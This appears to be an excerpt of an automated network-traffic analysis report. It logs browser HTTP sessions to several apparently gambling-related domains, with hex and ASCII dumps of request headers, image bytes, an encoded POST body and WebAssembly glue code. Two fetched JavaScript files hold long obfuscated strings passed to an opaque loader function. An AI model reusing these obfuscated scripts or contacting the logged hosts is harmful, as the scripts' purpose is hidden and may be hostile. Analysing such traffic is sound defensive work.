                                                                                                                                                          2024-06-09 22:41:18 UTC1369INData Raw: 63 6f 6e 73 74 20 69 64 20 3d 20 6d 65 6d 28 29 2e 67 65 74 55 69 6e 74 33 32 28 76 5f 61 64 64 72 2c 20 74 72 75 65 29 3b 0a 09 09 09 09 09 09 74 68 69 73 2e 5f 67 6f 52 65 66 43 6f 75 6e 74 73 5b 69 64 5d 2d 2d 3b 0a 09 09 09 09 09 09 69 66 20 28 74 68 69 73 2e 5f 67 6f 52 65 66 43 6f 75 6e 74 73 5b 69 64 5d 20 3d 3d 3d 20 30 29 20 7b 0a 09 09 09 09 09 09 09 63 6f 6e 73 74 20 76 20 3d 20 74 68 69 73 2e 5f 76 61 6c 75 65 73 5b 69 64 5d 3b 0a 09 09 09 09 09 09 09 74 68 69 73 2e 5f 76 61 6c 75 65 73 5b 69 64 5d 20 3d 20 6e 75 6c 6c 3b 0a 09 09 09 09 09 09 09 74 68 69 73 2e 5f 69 64 73 2e 64 65 6c 65 74 65 28 76 29 3b 0a 09 09 09 09 09 09 09 74 68 69 73 2e 5f 69 64 50 6f 6f 6c 2e 70 75 73 68 28 69 64 29 3b 0a 09 09 09 09 09 09 7d 0a 09 09 09 09 09 7d 2c 0a
                                                                                                                                                          Data Ascii: const id = mem().getUint32(v_addr, true);this._goRefCounts[id]--;if (this._goRefCounts[id] === 0) {const v = this._values[id];this._values[id] = null;this._ids.delete(v);this._idPool.push(id);}},
                                                                                                                                                          2024-06-09 22:41:18 UTC1369INData Raw: 3b 0a 09 09 09 09 09 7d 2c 0a 0a 09 09 09 09 09 2f 2f 20 76 61 6c 75 65 53 65 74 49 6e 64 65 78 28 76 20 72 65 66 2c 20 69 20 69 6e 74 2c 20 78 20 72 65 66 29 0a 09 09 09 09 09 22 73 79 73 63 61 6c 6c 2f 6a 73 2e 76 61 6c 75 65 53 65 74 49 6e 64 65 78 22 3a 20 28 76 5f 61 64 64 72 2c 20 69 2c 20 78 5f 61 64 64 72 29 20 3d 3e 20 7b 0a 09 09 09 09 09 09 52 65 66 6c 65 63 74 2e 73 65 74 28 6c 6f 61 64 56 61 6c 75 65 28 76 5f 61 64 64 72 29 2c 20 69 2c 20 6c 6f 61 64 56 61 6c 75 65 28 78 5f 61 64 64 72 29 29 3b 0a 09 09 09 09 09 7d 2c 0a 0a 09 09 09 09 09 2f 2f 20 66 75 6e 63 20 76 61 6c 75 65 43 61 6c 6c 28 76 20 72 65 66 2c 20 6d 20 73 74 72 69 6e 67 2c 20 61 72 67 73 20 5b 5d 72 65 66 29 20 28 72 65 66 2c 20 62 6f 6f 6c 29 0a 09 09 09 09 09 22 73 79 73 63
                                                                                                                                                          Data Ascii: ;},// valueSetIndex(v ref, i int, x ref)"syscall/js.valueSetIndex": (v_addr, i, x_addr) => {Reflect.set(loadValue(v_addr), i, loadValue(x_addr));},// func valueCall(v ref, m string, args []ref) (ref, bool)"sysc
                                                                                                                                                          2024-06-09 22:41:18 UTC1369INData Raw: 73 74 20 76 20 3d 20 6c 6f 61 64 56 61 6c 75 65 28 76 5f 61 64 64 72 29 3b 0a 09 09 09 09 09 09 63 6f 6e 73 74 20 61 72 67 73 20 3d 20 6c 6f 61 64 53 6c 69 63 65 4f 66 56 61 6c 75 65 73 28 61 72 67 73 5f 70 74 72 2c 20 61 72 67 73 5f 6c 65 6e 2c 20 61 72 67 73 5f 63 61 70 29 3b 0a 09 09 09 09 09 09 74 72 79 20 7b 0a 09 09 09 09 09 09 09 73 74 6f 72 65 56 61 6c 75 65 28 72 65 74 5f 61 64 64 72 2c 20 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 76 2c 20 61 72 67 73 29 29 3b 0a 09 09 09 09 09 09 09 6d 65 6d 28 29 2e 73 65 74 55 69 6e 74 38 28 72 65 74 5f 61 64 64 72 20 2b 20 38 2c 20 31 29 3b 0a 09 09 09 09 09 09 7d 20 63 61 74 63 68 20 28 65 72 72 29 20 7b 0a 09 09 09 09 09 09 09 73 74 6f 72 65 56 61 6c 75 65 28 72 65 74 5f 61 64 64 72 2c 20 65 72
                                                                                                                                                          Data Ascii: st v = loadValue(v_addr);const args = loadSliceOfValues(args_ptr, args_len, args_cap);try {storeValue(ret_addr, Reflect.construct(v, args));mem().setUint8(ret_addr + 8, 1);} catch (err) {storeValue(ret_addr, er


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          513192.168.2.550303188.114.97.34434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC408OUTGET /mimlib.wasm HTTP/1.1
                                                                                                                                                          Host: stt-wasm.ai4funs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          If-None-Match: W/"88346086e882b94f3127e009fea42084"
                                                                                                                                                          2024-06-09 22:41:18 UTC658INHTTP/1.1 304 Not Modified
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:18 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                          x-robots-tag: nosnippet
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2fwdYAEIeC3ogbm5t%2FsQnDJJ1mvwID1QwYMaDokRy6Nl6HnPiOKu8hkKd1JEszlkr4AK2q%2FDUNTsRPDmveR5f6WZ%2BW0fHzMsJErgHbkjzJZxcnLOyqY%2BzVeX5e51m46M0U7s4KhaQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8914a0dcde56e72a-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          514192.168.2.55029223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC370OUTGET /pc/image-pc/video/guide.jpg HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC602INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:18 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 75656
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Sat, 24 Aug 2019 10:08:29 GMT
                                                                                                                                                          ETag: "5d610c9d-12788"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[17],EU-GER-frankfurt-EDGE4-CACHE2[15,TCP_MISS,16],EU-FRA-paris-GLOBAL1-CACHE15[4],EU-FRA-paris-GLOBAL1-CACHE8[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 494137
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: f8cc711ab83566a7057db78a3f7c7074
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 1
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:19 UTC15782INData Raw: ff d8 ff db 00 84 00 02 01 01 01 01 01 02 01 01 02 03 02 01 02 03 03 02 02 02 02 03 03 03 03 03 03 03 03 05 03 04 04 04 04 03 05 05 05 06 06 06 05 05 07 07 08 08 07 07 0a 0a 0a 0a 0a 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 02 02 02 04 03 04 07 05 05 07 0a 08 07 08 0a 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff dd 00 04 00 53 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff c0 00 11 08 02 20 02 93 03 00 11 00 01 11 01 02 11 01 ff c4 00 ad 00 00 00 07 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 10 00 01 03 03 03 02 05 02 04 04 04 03 06 05 02 07 01 00 02 03
                                                                                                                                                          Data Ascii: SAdobed
                                                                                                                                                          2024-06-09 22:41:19 UTC16384INData Raw: aa 2b d5 45 ba 4f 3a 12 46 39 69 e0 a8 ce 09 90 91 32 b3 ae 9c 23 d5 4f 03 44 c4 7e 6f 95 99 f1 d0 b5 b3 21 78 ba 54 dc 2a 5d 55 50 73 2b b6 c1 e0 27 aa 8f 82 c8 24 51 dc 66 c3 09 f6 e5 51 22 c4 66 eb aa 4b ce 91 ef ca ae 4c 91 92 ea 8a b3 af 46 76 1b a7 89 8c c8 75 2d 68 6d 23 80 38 6a d1 07 6c b1 ae 8c 64 ef 32 b8 ef b8 dd 74 31 33 34 86 8b 88 db bf 2b 6c 19 54 fc 05 8d 5b f3 ee b4 45 99 32 44 69 e0 97 11 f0 b5 e3 67 3f 3c 41 11 04 e4 2d 31 39 53 5d 93 61 76 30 7b 2d 11 66 79 22 ca 89 fa 48 2e f8 5a a0 cc f3 45 bd 14 c0 38 2b 13 31 64 46 82 d2 03 18 d7 bb 92 73 fe ca d8 9c cc c5 a4 2e 25 5c 63 92 25 b5 df cb 24 77 0a 44 29 11 e5 7e 4a 09 24 56 de 70 31 37 6e ea 2c d7 80 a5 ac 7e ac 7b 95 0b 3a 10 45 6d 59 05 d8 1c aa 64 cd 51 2b e6 d8 bb ec a8 99 a1 22
                                                                                                                                                          Data Ascii: +EO:F9i2#OD~o!xT*]UPs+'$QfQ"fKLFvu-hm#8jld2t134+lT[E2Dig?<A-19S]av0{-fy"H.ZE8+1dFs.%\c%$wD)~J$Vp17n,~{:EmYdQ+"
                                                                                                                                                          2024-06-09 22:41:19 UTC16384INData Raw: 50 65 35 7d d0 d4 d4 38 83 98 db b0 ca cf 2c b6 cd d8 f1 52 11 4f 53 ea d9 4e 13 1c a0 5a 50 d6 e8 c6 4f a7 b2 d5 09 99 67 02 d6 0b af 95 11 79 3c 70 55 b6 63 96 1b 63 94 77 99 62 3a e3 79 69 e7 3d 92 f2 4b 47 1f 05 ed bb ae aa e9 d9 e5 ca 75 7f ba 1c 51 a6 1c c9 c4 9f 1f 88 64 37 0e 69 50 f6 cb 57 a9 35 f0 53 f5 17 53 4b 77 7f e6 22 00 38 f7 56 45 51 9b 3e 77 99 fd 23 35 5d 3e a2 70 54 ac 94 22 55 54 c9 b9 2a 13 66 c8 22 ba a2 4c 92 4f 0b 34 d9 a6 28 8d 21 e7 dd 56 5c 31 21 db 75 19 32 51 1b 7b 9c 1a 00 50 6c 9a 1a 71 cb b3 d9 56 d9 30 15 00 f0 21 f1 92 77 08 a0 b1 a9 a9 cb c6 7b 05 09 44 92 90 d7 90 1a 76 1b aa f4 25 6c 7a 38 f7 18 0a 51 8f 64 59 3a 9a 23 26 e7 f2 ad 11 89 9e 4c 9f 4b 48 d2 33 9d bb 2d 11 89 4c a4 49 8e 21 c0 38 56 51 06 d8 b6 41 9d 83
                                                                                                                                                          Data Ascii: Pe5}8,ROSNZPOgy<pUccwb:yi=KGuQd7iPW5SSKw"8VEQ>w#5]>pT"UT*f"LO4(!V\1!u2Q{PlqV0!w{Dv%lz8QdY:#&LKH3-LI!8VQA
                                                                                                                                                          2024-06-09 22:41:19 UTC16384INData Raw: d0 14 32 41 ea 99 3c 52 5b 34 57 d8 29 2f 3d 41 71 a7 b6 d8 69 df 35 ca a1 cd 65 3c 6d 21 ae 2e 3e a1 bf 65 08 75 d8 f2 bb 54 7b 1b c6 ee 8a 1d 29 e0 17 4f 75 6f 49 4b f8 7e a0 7b 69 69 6b 1c e7 12 75 f9 67 5b 7d 5b 67 50 ee 16 3e 26 47 2c d2 4d f4 68 cb 04 b1 a6 bc 9c ce e5 f5 db e3 85 aa 99 b6 9b e5 25 05 54 70 30 44 1d 24 6f 8d fa 58 34 82 4b 08 19 56 cb d2 b1 c9 f9 64 3f 79 28 fc 1e 70 eb 9e a6 9b aa 7a 82 b3 a8 1f 0b 63 9e b6 67 d4 ca c0 f7 16 87 3c e4 81 9d d6 e4 9c 22 a3 f4 64 b5 27 65 15 0d 96 e5 7b 96 58 e8 c3 33 10 d6 e0 e7 63 62 71 b2 a2 6d 9a 20 91 0e e3 d2 d7 a8 5e 59 2b 1b 86 ec 70 e1 85 44 ac be 2d 22 a3 0e 86 6d 12 34 ea 69 c1 c6 39 0a b5 22 db b4 6a 6c dd 59 4f 4c 58 7c a7 12 dc 64 e4 05 bb 16 7e a8 e5 e5 e2 3b bb 2f 6a 3a a9 f7 ea c8 6a
                                                                                                                                                          Data Ascii: 2A<R[4W)/=Aqi5e<m!.>euT{)OuoIK~{iikug[}[gP>&G,Mh%Tp0D$oX4KVd?y(pzcg<"d'e{X3cbqm ^Y+pD-"m4i9"jlYOLX|d~;/j:j
                                                                                                                                                          2024-06-09 22:41:19 UTC10722INData Raw: 5f ab 34 2f 4d 9f e1 14 5f f6 3a ba aa 42 2a a7 89 8d c9 2c 73 3d 04 81 df 4a b6 d2 1a f4 e9 7d 93 ac fe 12 dd 7a 84 7e 2e df 23 3c 98 c9 63 9f 21 6b 58 d2 3b ee 54 65 91 44 b2 3e 9d 7f 21 5e bc 1a 82 d3 4b 25 5d 6f 51 52 8a e8 da 5e ca 76 07 39 ce 23 7c 65 bb 6e 92 ca df 84 12 f4 ed 57 f9 1c e3 cc 06 47 3a a4 98 dd 92 4e 78 03 d8 2b ac c0 d0 ba 99 a6 22 39 58 74 b1 bc 82 01 d4 3b 7b 24 81 21 b7 b1 93 9d 55 59 f2 c9 f4 b5 bf e9 9e 11 74 4a 82 67 91 15 43 64 66 a3 11 f4 e3 9c 1f 64 58 a8 94 c7 46 d3 23 5e f1 1b 3b 34 9d f3 8e 02 8b 62 d4 8d 7a b9 cd 6f e9 aa 96 40 58 e8 6a 31 15 40 76 c1 f8 39 0d cf 3f b2 96 35 72 2f e3 3d 59 ce ee 35 34 12 35 cd 96 49 62 9b 3b 07 01 24 78 fb 8c 15 7b 6c e8 c6 99 5d 04 62 32 f9 e2 91 92 37 8c 37 20 fe c5 56 98 e7 15 54 37
                                                                                                                                                          Data Ascii: _4/M_:B*,s=J}z~.#<c!kX;TeD>!^K%]oQR^v9#|enWG:Nx+"9Xt;{$!UYtJgCdfdXF#^;4bzo@Xj1@v9?5r/=Y545Ib;$x{l]b277 VT7


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          515192.168.2.550285103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC678OUTPOST /zb-cloud/pwv/sn.website.pronotice.list HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Content-Length: 532
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://xpj723.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:18 UTC532OUTData Raw: 6a 73 6f 6e 3d 70 77 76 7c 31 33 7c 59 4a 70 44 4d 58 54 71 6b 52 41 62 4a 6e 51 74 4b 30 4f 77 46 71 58 65 49 76 68 33 52 6e 66 33 51 74 4d 34 4d 42 4f 32 4f 49 56 6c 59 76 4a 6f 43 7a 58 63 58 65 7a 75 6c 32 35 6f 7a 4b 55 74 4b 74 54 65 54 30 54 73 48 66 46 64 50 69 44 76 4d 68 47 6a 4e 61 4e 79 59 77 59 6a 4c 59 55 73 6d 32 49 76 48 74 59 69 51 30 4d 74 4b 74 55 73 69 78 35 33 47 52 46 77 66 42 51 6f 56 6e 5a 77 7a 32 35 77 74 48 79 76 4d 48 35 69 6d 59 51 30 4e 45 41 69 45 44 5a 41 4e 42 51 77 6d 52 59 66 4e 44 31 75 46 51 4e 63 49 57 58 42 48 52 62 44 5a 55 56 6b 70 32 34 61 43 76 4a 6f 51 30 50 64 57 65 54 69 79 48 4d 67 48 44 54 72 51 49 51 59 46 51 4e 63 63 4a 46 74 61 43 6a 6c 5a 55 56 6b 57 49 44 4e 4b 57 4d 6a 76 4e 4c 67 44 41 55 74 55 68 53
                                                                                                                                                          Data Ascii: json=pwv|13|YJpDMXTqkRAbJnQtK0OwFqXeIvh3Rnf3QtM4MBO2OIVlYvJoCzXcXezul25ozKUtKtTeT0TsHfFdPiDvMhGjNaNyYwYjLYUsm2IvHtYiQ0MtKtUsix53GRFwfBQoVnZwz25wtHyvMH5imYQ0NEAiEDZANBQwmRYfND1uFQNcIWXBHRbDZUVkp24aCvJoQ0PdWeTiyHMgHDTrQIQYFQNccJFtaCjlZUVkWIDNKWMjvNLgDAUtUhS
                                                                                                                                                          2024-06-09 22:41:19 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:19 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:19 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 31 39 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          2024-06-09 22:41:19 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/plain;charset=utf-8
                                                                                                                                                          2024-06-09 22:41:19 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:19 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:19 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 31 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 1
                                                                                                                                                          2024-06-09 22:41:19 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:19 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 36 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp16)
                                                                                                                                                          2024-06-09 22:41:19 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          516192.168.2.55029590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC558OUTGET /pc/240516-03/static/js/components/ConversionBox.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC642INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 5240
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:45 GMT
                                                                                                                                                          ETag: "6645cac5-1478"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[3],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE8[325],EU-GER-frankfurt-GLOBAL1-CACHE8[322,TCP_MISS,324],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 2e63f5c42df54d2c6929bb8b0202b933
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1823397
                                                                                                                                                          X-CCDN-Expires: 768603
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:19 UTC5240INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 48 41 5a 6c 77 46 30 41 61 41 62 77 44 4d 55 42 50 46 41 4c 67 6f 46 63 30 59 41 58 41 53 33 55 31 5a 4b 67 45 6f 79 41 58 78 49 41 50 41 4a 49 42 47 41 44 59 4e 6d 62 54 6d 6d 36 38 53 37 41 51 43 4a 47 53 45 41 41 49 6b 72 41 45 37 73 32 61 67 4e 77 42 35 4d 41 43 73 51 62 41 48 51 41 54 45 42 58 5a 6f 51 41 42 58 30 6f 49 49 66 61 32 71 59 6f 45 6a 55 41 66 57 43 51 4a 41 42 5a 46 48 74 47 4b 52 41 31 63 67 41 33 4b 43 6c 47 45 44 6f 41 51 67 41 47 51 54 34 54 5a 50 31 74 45 41 42 65 64 6b 77 31 41 42 46 37 58 47 41 31 50 68 49 30 55 74 74 46 45 48 71 6b 55 76 4b 73 6d 41 67 4b 4f 70 4a 39 44 72 55 49 67 42 59 4b 41 44 45 2b 71 53 62 46 66
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAHAZlwF0AaAbwDMUBPFALgoFc0YAXAS3U1ZKgEoyAXxIAPAJIBGADYNmbTmm68S7AQCJGSEAAIkrAE7s2agNwB5MACsQbAHQATEBXZoQABX0oIIfa2qYoEjUAfWCQJABZFHtGKRA1cgA3KClGEDoAQgAGQT4TZP1tEABedkw1ABF7XGA1PhI0UttFEHqkUvKsmAgKOpJ9DrUIgBYKADE+qSbFf


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          517192.168.2.55029490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC552OUTGET /pc/240516-03/static/js/t4043-otherConf-js.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC627INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 320
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 09:01:35 GMT
                                                                                                                                                          ETag: "6645cb6f-140"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[5],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,4],EU-FRA-paris-GLOBAL1-CACHE17[3],EU-FRA-paris-GLOBAL1-CACHE18[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063157
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: ff70cf02649eca202ac6b8506447e9ba
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528843
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:19 UTC320INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6e 41 4e 67 46 30 41 61 41 62 77 41 6b 45 41 4e 41 5a 51 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 54 45 59 67 4a 32 4a 73 41 6c 4b 51 42 45 54 4a 43 41 41 45 53 4e 6e 77 37 74 52 41 62 67 44 79 59 41 46 59 68 32 41 4f 67 41 6d 49 42 68 7a 51 67 41 43 6e 78 51 51 51 66 4e 67 45 39 4d 41 30 51 48 31 48 49 4a 41 46 6b 55 75 70 67 42 73 51 6f 73 67 42 75 55 4e 35 4d 49 48 51 41 68 41 41 4d 41 4c 35 43 67 6e 72 32 78 4b 4a 49 4d 4f 62 65 76 6e 7a 2b 7a 4b 79 63 33 43 4a 38 49 47 78 4d 66 47 68 53 4b 4c 48 78 75 6f 6d 69 4d 46 42 38 75 6d 59 6f 41 52 7a 36 66 41 43 69 41 42 34 77 49 66 70 5a 4c 4f 78 63 61 4a 6a 35 68 63 57 6c 4d 4c 46 4b 51 58 78
